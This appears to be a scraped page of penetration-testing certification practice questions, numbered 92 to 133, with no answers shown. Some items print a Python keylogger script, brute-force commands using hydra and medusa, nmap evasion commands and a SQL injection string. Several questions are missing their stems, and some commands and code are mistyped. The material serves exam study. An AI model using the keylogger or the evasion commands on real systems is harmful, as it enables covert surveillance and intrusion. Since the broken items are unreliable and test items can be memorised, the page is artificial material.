To identify potential risks and threats during testing

B.  

To define the boundaries and objectives

C.  

To ensure that all vulnerabilities are identified and addressed

D.  

To validate the project timeline and resource allocations

Discussion 0
Questions 92

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?

Options:

A.  

OWASP

B.  

MITRE ATT&CK

C.  

PTES

D.  

NIST

Discussion 0
Questions 93

A penetration tester is taking screen captures of hashes obtained from a domain controller. Which of the following best explains why the penetration tester should immediately obscure portions of the images before saving?

Options:

A.  

To maintain confidentiality of data/information

B.  

To avoid disclosure of how the hashes were obtained

C.  

To make the hashes appear shorter and easier to crack

D.  

To prevent analysis based on the type of hash

Discussion 0
Questions 94

A security consultant wants to perform a vulnerability assessment with an application that can effortlessly generate an easy-to-read report. Which of the following should the attacker use?

Options:

A.  

Brakeman

B.  

Nessus

C.  

Metasploit

D.  

SCAP

Discussion 0
Questions 95

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

[ATTEMPT] target 192.168.1.112 - login "root" - pass "abcde"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "edcfg"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "qazsw"

[ATTEMPT] target 192.168.1.112 - login "root" – pass “tyuio”

Which of the following is the penetration tester conducting?

Options:

A.  

Port scan

B.  

Brute force

C.  

Credential stuffing

D.  

DoS attack

Discussion 0
Questions 96

Given the following user-supplied data:

www.comptia.com/info.php?id=1 AND 1=1

Which of the following attack techniques is the penetration tester likely implementing?

Options:

A.  

Boolean-based SQL injection

B.  

Time-based SQL injection

C.  

Stored cross-site scripting

D.  

Reflected cross-site scripting

Discussion 0
Questions 97

Options:

A.  

Burp Suite

B.  

Nessus

C.  

Nikto

D.  

SQLmap

Discussion 0
Questions 98

During an engagement, a junior penetration tester found a multihomed host that led to an unknown network segment. The penetration tester ran a port scan against the network segment, which caused an outage at the customer's factory. Which of the following documents should the junior penetration tester most likely follow to avoid this issue in the future?

Options:

A.  

NDA

B.  

MSA

C.  

ROE

D.  

SLA

Discussion 0
Questions 99

A penetration tester was hired to test Wi-Fi equipment. Which of the following tools should be used to gather information about the wireless network?

Options:

A.  

Kismet

B.  

Burp Suite

C.  

BeEF

D.  

WHOIS

Discussion 0
Questions 100

A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next?

Options:

A.  

Vishing

B.  

Watering hole

C.  

Whaling

D.  

Spear phishing

Discussion 0
Questions 101

Which of the following components should a penetration tester most likely include in a report at the end of an assessment?

Options:

A.  

Metrics and measures

B.  

Client interviews

C.  

Compliance information

D.  

Business policies

Discussion 0
Questions 102

A penetration tester was able to gain access to a plaintext file on a user workstation. Upon opening the file, the tester notices some strings of randomly generated text. The tester is able to use these strings to move laterally throughout the network by accessing the fileshare on a web application. Which of the following should the organization do to remediate the issue?

Options:

A.  

Sanitize user input.

B.  

Implement password management solution.

C.  

Rotate keys.

D.  

Utilize certificate management.

Discussion 0
Questions 103

Which of the following would be the most efficient way to write a Python script that interacts with a web application?

Options:

A.  

Create a class for requests.

B.  

Write a function for requests.

C.  

Import the requests library.

D.  

Use the cURL OS command.

Discussion 0
Questions 104

A penetration tester is enumerating shares and receives the following output:

Which of the following should the penetration tester enumerate next?

Options:

A.  

dev

B.  

print$

C.  

home

D.  

notes

Discussion 0
Questions 105

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

Options:

A.  

OWASP Top 10

B.  

MITRE ATT&CK

C.  

Cyber Kill Chain

D.  

Well-Architected Framework

Discussion 0
Questions 106

A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network. Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?

Options:

A.  

nmap —script=s7-info -p 102 10.88.88.76/24 -T3

B.  

nmap —script=wsdd-discover -p 3702 -sUlO.88.88.76/24

C.  

nmap --script=iax2-version -p 4569 -sU -V 10.88.88.76/24 -T2

D.  

nmap --script=xll-access -p 6000-6009 10.88.88.76/24

Discussion 0
Questions 107

A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective?

Options:

A.  

nmap -F 192.168.5.5

B.  

nmap -datalength 2 192.168.5.5

C.  

nmap -D 10.5.2.2 192.168.5.5

D.  

nmap -scanflags SYNFIN 192.168.5.5

Discussion 0
Questions 108

A penetration tester is performing an assessment against a customer’s web application that is hosted in a major cloud provider’s environment. The penetration tester observes that the majority of the attacks attempted are being blocked by the organization's WAF. Which of the following attacks would be most likely to succeed?

Options:

A.  

Reflected XSS

B.  

Brute-force

C.  

DDoS

D.  

Direct-to-origin

Discussion 0
Questions 109

A penetration testing firm wants to hire three additional consultants to support a newly signed long-term contract with a major customer. The following is a summary of candidate

background checks:

Which of the following candidates should most likely be excluded from consideration?

Options:

A.  

Candidate 1

B.  

Candidate 2

C.  

Candidate 3

D.  

Candidate 4

Discussion 0
Questions 110

During a security assessment of a web application, a penetration tester was able to generate the following application response:

Unclosed quotation mark after the character string Incorrect syntax near ".

Which of the following is the most probable finding?

Options:

A.  

SQL injection

B.  

Cross-site scripting

C.  

Business logic flaw

D.  

Race condition

Discussion 0
Questions 111

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

Options:

A.  

nmap -sU -p 1-1024 10.0.0.15

B.  

nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

C.  

nmap -T5 -p 1-65535 -A 10.0.0.15

D.  

nmap -T3 -F 10.0.0.15

Discussion 0
Questions 112

During a test of a custom-built web application, a penetration tester identifies several vulnerabilities. Which of the following would be the most interested in the steps to reproduce these vulnerabilities?

Options:

A.  

Operations staff

B.  

Developers

C.  

Third-party stakeholders

D.  

C-suite executives

Discussion 0
Questions 113

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

Options:

A.  

Multiplexing

B.  

Bluejacking

C.  

Zero-day attack

D.  

Smurf attack

Discussion 0
Questions 114

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization's sensitive files?

Options:

A.  

Remote file inclusion

B.  

Cross-site scripting

C.  

SQL injection

D.  

Insecure direct object references

Discussion 0
Questions 115

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server's name. Which of the following is the best way for a penetration tester to exploit this situation?

Options:

A.  

Relay the traffic to the real file server and steal documents as they pass through.

B.  

Host a malicious file to compromise the workstation.

C.  

Reply to the broadcasts with a fake IP address to deny access to the real file server.

D.  

Respond to the requests with the tester's IP address and steal authentication credentials.

Discussion 0
Questions 116

A penetration tester is performing an assessment for an organization and must gather valid user credentials. Which of the following attacks would be best for the tester to use to achieve this objective?

Options:

A.  

Wardriving

B.  

Captive portal

C.  

Deauthentication

D.  

Impersonation

Discussion 0
Questions 117

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

Options:

A.  

Drozer

B.  

Burp Suite

C.  

Android SDK Tools

D.  

MobSF

Discussion 0
Questions 118

Options:

A.  

Perform penetration testing regularly.

B.  

Perform a security evaluation based on the OWASP Top 10.

C.  

Implement a peer review process during the coding phase.

D.  

Implement security scanning during the pipeline for the CI/CD flow.

Discussion 0
Questions 119

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.

Which of the following commands should the engineer use to achieve the objective in the least amount of time?

Options:

A.  

nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100

B.  

nmap -TO -p 80 10.0.0.0/16

C.  

nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60

D.  

nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80

Discussion 0
Questions 120

Which of the following is the most common vulnerability associated with loT devices that are directly connected to the internet?

Options:

A.  

Unsupported operating systems

B.  

Susceptibility to DDoS attacks

C.  

Inability to network

D.  

The existence of default passwords

Discussion 0
Questions 121

During an assessment, a penetration tester needs to perform a cloud asset discovery of an organization. Which of the following tools would most likely provide more accurate results in this situation?

Options:

A.  

Pacu

B.  

Scout Suite

C.  

Shodan

D.  

TruffleHog

Discussion 0
Questions 122

A penetration tester wants to perform a SQL injection test. Which of the following characters should the tester use to start the SQL injection attempt?

Options:

A.  

Colon

B.  

Double quote mark

C.  

Single quote mark

D.  

Semicolon

Discussion 0
Questions 123

For an engagement, a penetration tester is required to use only local operating system tools for file transfer. Which of the following options should the penetration tester consider?

Options:

A.  

Netcat

B.  

WinSCP

C.  

Filezilla

D.  

Netstat

Discussion 0
Questions 124

A penetration tester would like to crack a hash using a list of hashes and a predefined set of rules. The tester runs the following command: hashcat.exe -a 0 .\hash.txt .\rockyou.txt -r .\rules\replace.rule

Which of the following is the penetration tester using to crack the hash?

Options:

A.  

Hybrid attack

B.  

Dictionary

C.  

Rainbow table

D.  

Brute-force method

Discussion 0
Questions 125

Which of the following is the most important to include in the scope of a wireless security assessment?

Options:

A.  

Frequencies

B.  

APs

C.  

SSIDs

D.  

Signal strengths

Discussion 0
Questions 126

A penetration tester enters a command into the shell and receives the following output:

C:\Users\UserX\Desktop>vmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v |C:\\Windows\\" I findstr /i /v""

VulnerableService Some Vulnerable Service C:\Program Files\A Subfolder\B Subfolder\SomeExecutable.exe Automatic

Which of the following types of vulnerabilities does this system contain?

Options:

A.  

Unquoted service path

B.  

Writable services

C.  

Clear text credentials

D.  

Insecure file/folder permissions

Discussion 0
Questions 127

During an assessment, a penetration tester emailed the following Python script to CompTIA's employees:

import pyHook, sys, logging, pythoncom, datetime

log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):

logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii)

logging.log(10, chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = KbrdEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

Which of the following is the intended effect of this script?

Options:

A.  

Debugging an exploit

B.  

Keylogging

C.  

Collecting logs

D.  

Scheduling tasks

Discussion 0
Questions 128

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?

Options:

A.  

DirBuster

B.  

Open VAS

C.  

Scout Suite

D.  

CeWL

Discussion 0
Questions 129

Which of the following tools would be the best to use to intercept an HTTP response at an API, change its content, and forward it back to the origin mobile device?

Options:

A.  

Drozer

B.  

Burp Suite

C.  

Android SDK Tools

D.  

MobSF

Discussion 0
Questions 130

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

Options:

A.  

ROE

B.  

SLA

C.  

NDA

D.  

SOW

Discussion 0
Questions 131

Which of the following describes how a penetration tester could prioritize findings in a report?

Options:

A.  

Business mission and goals

B.  

Cyberassets

C.  

Network infrastructure

D.  

Cyberthreats

Discussion 0
Questions 132

A penetration tester runs an Nmap scan and obtains the following output:

Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-12 18:53 GMT

Nmap scan report for 10.22.2.2

Host is up (0.0011s latency).

PORTSTATE SERVICEVERSION

135/tcpopen msrpcMicrosoft Windows RPC

139/tcpopen netbios-ssnMicrosoft Windows netbios-ssn

445/tcpopen microsoft-dsMicrosoft Windows Server 2019

1433/tcpopen ms-sql-sMicrosoft SQL Server 2019

3389/tcpopen ms-wbt-serverMicrosoft Terminal Services

8080/tcpopen httpMicrosoft IIS 9.0

Which of the following commands should the penetration tester try next to explore this server?

Options:

A.  

nikto -host http://10.22.2-2

B.  

hydra -1 administrator -P passwords.txt ftp://10.22.2.2

C.  

nmap -p 3389 —script vnc-info.nse 10.22.2.2

D.  

medusa -h 10.22.2.2 -n 1433 -u sa -P passwords.txt -M mssql

Discussion 0
Questions 133

Options:

A.  

Tailgating

B.  

Spear phishing

C.  

Whaling

D.  

Email phishing

Discussion 0